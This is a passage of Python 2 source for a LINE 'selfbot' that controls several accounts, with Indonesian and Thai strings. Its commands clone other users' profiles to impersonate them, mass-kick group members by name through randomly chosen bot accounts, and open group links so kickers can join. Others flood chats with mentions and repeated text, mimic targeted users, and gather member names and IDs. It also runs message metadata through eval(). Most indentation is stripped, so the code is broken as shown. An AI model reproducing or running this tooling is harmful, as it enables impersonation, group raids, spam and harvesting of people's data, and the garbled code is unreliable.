cl.sendText(msg.to,"Ini telah diubah🛡\n\n" + n)
elif msg.text.lower() == 'update':
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Diperbarui👈")
else:
cl.sendText(msg.to,"Silahkan Aktifkan Nama")
elif msg.text in ["Point","นับ"]:
if msg.toType == 2:
cl.sendText(msg.to, "ตั้งจุดเช็คคนอ่าน:" + datetime.now().strftime('\n📅%Y/%m/%d 🕛 %H:%M:%S'))
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('📅%Y-%m-%d 🕛 %H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text in ["Read","อ่าน"]:
if msg.toType == 2:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "==============================\nActive readers:%s\n\n\n\nPassive readers:\n%s\n\n==============================\nIn the last seen point:\n[%s]\n==============================\n Powered By: kieselfbotline" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
print "ReadPoint Set..."
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('📅%Y-%m-%d 🕛 %H:%M:%S')
wait2['ROM'][msg.to] = {}
                    print wait2
cl.sendText(msg.to, "Auto set reading point in:" + datetime.now().strftime('\n📅%Y-%m-%d 🕛 %H:%M:%S'))
else:
cl.sendText(msg.to, "Reading point has not been set.")
#-----------------------[Add Staff Section]------------------------
elif "Add staff @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff add executing"
_name = msg.text.replace("Add staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the staff list")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Remove staff @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff remove executing"
_name = msg.text.replace("Remove staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the staff list")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["Stafflist","stafflist"]:
if staff == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Staff list: ")
mc = ""
for mi_d in staff:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#-----------------------------------------------------------
elif msg.text in ["Group creator","Gc","Gcreator","gcreator"]:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': gCreator}
cl.sendMessage(msg)
cl.sendText(msg.to,"""╔══════════════
💥ผู้สร้างกลุ่ม Creator 💥Group""")
#staff-----------------------------------------------------------
elif "Getname" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif "Getprofile" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"💗ชื่อ💗 :\n" + contact.displayName + "\n\n💗สเตตัส💗 :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "Getcontact" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)
elif "Getinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu))
except:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu))
elif "Getbio" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
except:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
#----------------------------------------------------
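            # 'Mycopy @name' clones the tagged member's profile onto the main
            # account via LINETCR's cloneContactProfile; 'Mybackup' undoes it
            # using the snapshot taken at startup.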
elif "Mycopy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Mycopy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
cl.cloneContactProfile(target)
cl.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
#=================================================
elif msg.text in ["Mybackup"]:
try:
cl.updateDisplayPicture(mybackup.pictureStatus)
cl.updateProfile(mybackup)
cl.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
cl.sendText(msg.to, str (e))
#-------------------------------- PP BY TAG ---------------------------------
elif "Lo @" in msg.text:
if msg.toType == 2:
cover = msg.text.replace("Cover @","")
_nametarget = cover.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
h = cl.channel.getHome(target)
objId = h["result"]["homeInfo"]["objectId"]
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/myhome/c/download.nhn?userid=" + target + "&oid=" + objId)
except Exception as error:
print error
cl.sendText(msg.to,"Upload image failed.")
elif "pp @" in msg.text:
if msg.toType == 2:
cover = msg.text.replace("pp @","")
_nametarget = cover.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
h = cl.getContact(target)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
xname = cl.getContact(msg.from_).displayName
cl.sendText(msg.to,"Kepo Kaka Yaa "+xname+"\n (`・ω・´)\n \n" + datetime.now().strftime('%H:%M:%S'))
except Exception as error:
print error
cl.sendText(msg.to,"Upload image failed.")
elif "Pp @" in msg.text:
if msg.toType == 2:
cover = msg.text.replace("Pp @","")
_nametarget = cover.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
h = cl.getContact(target)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
except Exception as error:
print error
cl.sendText(msg.to,"Upload image failed.")
elif msg.text.lower() in ["pap owner","pap creator"]:
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/0hQHBfiuxIDmd_HyI5amNxMENaAAoIMQgvBywTVFNIAgRTLk9kRHBCAlkcAFMGKkBiS3hAUQgbBVFU")
#----------------------------------------------------------------------
elif msg.text in ["Rejectall"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Completion。")
ki.sendText(msg.to,"Completion。")
ki2.sendText(msg.to,"Completion。")
ki3.sendText(msg.to,"Completion。")
ki4.sendText(msg.to,"Completion。")
ki5.sendText(msg.to,"💟ทำการลบห้องรันหมดแล้ว💟")
else:
cl.sendText(msg.to,"key is wrong。")
#----------------------------------------------------------------
elif msg.text in ["Reject","ลบรัน"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปฏิเสทคำเชิญเข้ากลุ่มทั้งหมดเรียบร้อย")
else:
cl.sendText(msg.to,"key is wrong")
elif msg.text in ["Reject1","ลบรัน1"]:
gid = ki.getGroupIdsInvited()
for i in gid:
ki.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"ปฏิเสทค้างเชิญเรียบร้อย")
else:
ki.sendText(msg.to,"key is wrong")
#========================================
elif msg.text.lower() == 'welcome':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
#=========================================
elif "Say " in msg.text:
string = msg.text.replace("Say ","")
if len(string.decode('utf-8')) <= 50:
ki.sendText(msg.to," " + string + " ")
ki2.sendText(msg.to," " + string + " ")
ki3.sendText(msg.to," " + string + " ")
ki4.sendText(msg.to," " + string + " ")
ki5.sendText(msg.to," " + string + " ")
ki.sendText(msg.to," " + string + " ")
ki2.sendText(msg.to," " + string + " ")
ki3.sendText(msg.to," " + string + " ")
ki4.sendText(msg.to," " + string + " ")
ki5.sendText(msg.to," " + string + " ")
ki.sendText(msg.to," " + string + " ")
ki2.sendText(msg.to," " + string + " ")
ki3.sendText(msg.to," " + string + " ")
ki4.sendText(msg.to," " + string + " ")
ki5.sendText(msg.to," " + string + " ")
#-----------------------------------------------
elif "vdo:" in msg.text.lower():
if msg.toType == 2:
query = msg.text.split(":")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Youtube ' in msg.text:
try:
textToSearch = (msg.text).replace('Youtube ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
cl.sendText(msg.to,'https://www.youtube.com' + results['href'])
except:
cl.sendText(msg.to,"Could not find it")
#==================================================
elif msg.text in ["ทีมงาน","ทีมทดลองบอท"]:
msg.contentType = 13
cl.sendText(msg.to, "[SELFBOT PHET HACK BOT]\n\n[☢Ŧ€₳M≈ನန้ণএ≈฿❂Ŧ☢]\n[By.ทีมงานทีมทดลองบอท]")
cl.sendText(msg.to, "ผู้จัดการทีมงาน:kielovebot")
msg.contentMetadata = {'mid': 'uca51afa767df87ba3705494b97c3355c'}
cl.sendMessage(msg)
#=====================================================
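# Translation commands. "Tr-id/-en/-th" go through the googletrans-style
# Translator() object; the "Id@en" family scrapes translate.google.com's
# mobile page and pulls the result out of the class="t0" element.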
elif "Tr-id " in msg.text:
isi = msg.text.replace("Tr-id ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-en " in msg.text:
isi = msg.text.replace("Tr-en ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-th " in msg.text:
isi = msg.text.replace("Tr-th ","")
translator = Translator()
hasil = translator.translate(isi, dest='th')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Id@en" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'en'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Indonesia----\n" + "" + kata + "\n\n----Ke Inggris----\n" + "" + result)
elif "En@id" in msg.text:
bahasa_awal = 'en'
bahasa_tujuan = 'id'
kata = msg.text.replace("En@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Inggris----\n" + "" + kata + "\n\n----Ke Indonesia----\n" + "" + result)
elif "Id@th" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'th'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Indonesia----\n" + "" + kata + "\n\n----Ke Thailand----\n" + "" + result)
elif "Th@id" in msg.text:
bahasa_awal = 'th'
bahasa_tujuan = 'id'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Thailand----\n" + "" + kata + "\n\n----Ke Indonesia----\n" + "" + result)
elif msg.text in ["Friendlist"]:
contactlist = cl.getAllContactIds()
kontak = cl.getContacts(contactlist)
num=1
msgs="═════════List Friend═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Friend═════════\n\nTotal Friend : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Memlist"]:
kontak = cl.getGroup(msg.to)
group = kontak.members
num=1
msgs="═════════List Member═�����═══════-"
for ids in group:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(group)
cl.sendText(msg.to, msgs)
#=========================================
elif msg.text in ["Mimic on","mimic on"]:
if wait3["copy"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic On")
else:
wait3["copy"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Mimic off","mimic:off"]:
if wait3["copy"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic Off")
else:
wait3["copy"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic Off")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Target list"]:
if wait3["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in wait3["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if wait3["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
wait3["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
wait3["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Target @" in msg.text:
target = msg.text.replace("Target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
wait3["target"][t] = True
cl.sendText(msg.to,"Target added")
elif "Del target @" in msg.text:
target = msg.text.replace("Del target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
del wait3["target"][t]
cl.sendText(msg.to,"Target deleted")
#=======================================
#========================================
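# "Nk name": kick-by-name. Opens the group's join link, pulls ki5 in via a
# reissued ticket, kicks every member whose display name contains the text,
# then closes the link again.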
elif "Nk " in msg.text:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
cl.sendText(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki5.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
ki5.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
#----------------------------------------------------
elif msg.text in ["Aslogin","ขอลิ้ง"]:
if LINETCRLogged == False:
ki.login(qr=True)
ki.loginResult()
user2 = ki.getProfile().mid
LINETCRLogged = True
cl.sendText(msg.to,"ล็อคอินสำเร็จ Asul พร้อมใช้งานแล้ว")
else:
cl.sendText(msg.to,"Asul ได้ทำการล็อคอินไปแล้ว")
elif msg.text.lower() == ".":
gs = []
try:
gs = cl.getGroup(msg.to).members
except:
try:
gs = cl.getRoom(msg.to).contacts
except:
pass
tlist = ""
for i in gs:
tlist = tlist+i.displayName+" "+i.mid+"\n\n"
if LINETCRLogged == True:
try:
ki.sendText(user1,tlist)
except:
ki.new_post(tlist)
else:
cl.sendText(msg.to,"Asul ยังไม่ได้ล็อคอิน")
#-----------------------------------------------------------
elif msg.text in ["Help2","Key","KEY"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage2)
else:
cl.sendText(msg.to,help)
#----------------------ADMIN COMMAND------------------------------#
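# Mention-based kicks: the @-mention metadata is read from
# msg.contentMetadata["MENTION"] and each mentioned mid is kicked by the
# chosen account (cl, ki or ki5).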
elif ("Kick " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif ("Kick1 " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif ("Kick5 " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki5.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif msg.text in ["Mention","Tagall"]:
group = cl.getGroup(msg.to)
k = len(group.members)//100
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*100 : (j+1)*100]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
cl.sendMessage(msg)
elif "Ratakan" in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Ratakan","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("all","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"user does not exist")
pass
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Sukses Bosqu")
cl.sendText(msg.to,"masih mauko sundala")
elif msg.text in ["List grup"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
h = "===[List Groups]==="
total = str(len(gid))
for i in gid:
if i is not None:
try:
groups = cl.getGroup(i)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h += "\n[" + groups.name + "] ->(" + members +")\n -+GroupID : " + i
except:
break
else:
break
if gid is not None:
cl.sendText(msg.to,h + "\n|[Total Groups]| : " + str(total))
else:
cl.sendText(msg.to,"Tidak ada grup saat ini")
ginv = cl.getGroupIdsInvited()
j = "===[List Groups Invited]==="
totals = str(len(ginv))
for z in ginv:
if z is not None:
try:
groups = cl.getGroup(z)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
j += "\n[" + groups.name + "] ->(" + members + ")\n -+GroupID : " + i
except:
break
else:
break
if ginv is not None:
cl.sendText(msg.to,j + "\n|[Total Groups Invited]| : " + str(totals))
else:
cl.sendText(msg.to,"Tidak ada grup tertunda saat ini")
elif msg.text in ["Info grup"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
cl.sendText(msg.to,"===[List Details Group]===")
total = str(len(gid))
for i in gid:
if i is not None:
try:
groups = ki.getGroup(i)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h = "[" + groups.name + "]\n -+GroupID : " + i + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName
except:
break
else:
break
if gid is not None:
cl.sendText(msg.to,h)
cl.sendText(msg.to,"|[Total Groups]| : " + str(total))
else:
cl.sendText(msg.to,"Tidak ada grup saat ini")
ginv = cl.getGroupIdsInvited()
cl.sendText(msg.to,"===[List Details Groups Invited]===")
totals = str(len(ginv))
for z in ginv:
if z is not None:
try:
groups = cl.getGroup(z)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
j = "[" + groups.name + "]\n -+GroupID : " + i + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName
except:
break
else:
break
if ginv is not None:
cl.sendText(msg.to,j)
cl.sendText(msg.to,"|[Total Groups Invited]| : " + str(totals))
else:
cl.sendText(msg.to,"Tidak ada grup tertunda saat ini")
elif "Details grup: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("/DetailsGroup: ","")
if gid in [""," "]:
cl.sendText(msg.to,"Grup id tidak valid")
else:
try:
groups = cl.getGroup(gid)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h = "[" + groups.name + "]\n -+GroupID : " + gid + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName + "\n -+GroupPicture : http://dl.profile.line.naver.jp/" + groups.pictureStatus
cl.sendText(msg.to,h)
except Exception as error:
cl.sendText(msg.to,(error))
elif "Cancel invite: " in msg.text:
if msg.from_ in admin:
gids = msg.text.replace("Cancel invite: ","")
gid = cl.getGroup(gids)
for i in gid:
if i is not None:
try:
cl.rejectGroupInvitation(i)
except:
cl.sendText(msg.to,"Error!")
break
else:
break
if gid is not None:
cl.sendText(msg.to,"Berhasil tolak undangan dari grup " + gid.name)
else:
cl.sendText(msg.to,"Grup tidak ditemukan")
elif msg.text in ["Accept invite"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
_list = ""
for i in gid:
if i is not None:
gids = cl.getGroup(i)
_list += gids.name
cl.acceptGroupInvitation(i)
else:
break
if gid is not None:
cl.sendText(msg.to,"Berhasil terima semua undangan dari grup :\n" + _list)
else:
cl.sendText(msg.to,"Tidak ada grup yang tertunda saat ini")
elif "Myname: " in msg.text:
string = msg.text.replace("Myname: ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Bio" + string)
elif "Mybio: " in msg.text:
string = msg.text.replace("Mybio: ","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Bio" + string)
elif ("Gname: " in msg.text):
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.name = msg.text.replace("Gname: ","")
cl.updateGroup(group)
else:
cl.sendText(msg.to,"Tidak Dapat Mengubah Nama Grup")
elif "Kick: " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick: ","")
cl.kickoutFromGroup(msg.to,[midd])
elif msg.text in ["Invite:","ดึง:"]:
if msg.from_ in admin:
midd = msg.text.replace("Invite: ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif "My @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("My @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Copy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.cloneContactProfile(target)
cl.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy1 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy1 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki.cloneContactProfile(target)
ki.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy2 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy2 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki2.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki2.cloneContactProfile(target)
ki2.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy3 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy3 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki3.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki3.cloneContactProfile(target)
ki3.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy4 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy4 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki4.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki4.cloneContactProfile(target)
ki4.sendText(msg.to, "Sukses Copy Profile")
